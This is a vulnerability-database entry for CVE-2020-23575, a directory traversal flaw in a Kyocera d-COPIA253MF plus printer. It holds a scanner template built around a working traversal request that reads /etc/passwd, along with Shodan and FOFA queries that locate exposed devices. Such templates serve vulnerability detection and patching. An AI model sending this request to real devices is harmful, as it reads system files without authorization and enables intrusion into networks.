CVE-2020-23575: Kyocera Printer d-COPIA253MF - Directory Traversal

2025-08-01 Kyocera Printer d-COPIA253MF PoC Public

Description

Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.

PoC

id: CVE-2020-23575

info:
  name: Kyocera Printer d-COPIA253MF - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/48561
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23575
    - https://www.kyoceradocumentsolutions.com.tr/tr.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23575
    cwe-id: CWE-22
    epss-score: 0.36765
    epss-percentile: 0.98422
    cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kyocera
    product: d-copia253mf_plus_firmware
    shodan-query: http.favicon.hash:-50306417
    fofa-query: icon_hash=-50306417
  tags: cve2020,cve,printer,iot,lfi,edb,kyocera,vkev,intrusive,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "bin:.*:1:1"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a004630440220590a4a1044218b6edd0569c29f4ead5450bdde14606558b3d38b38d482d87817022056681d2601772455d56ba90f04d63acdf8e9ec81bc823080c23218a6e0317729:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities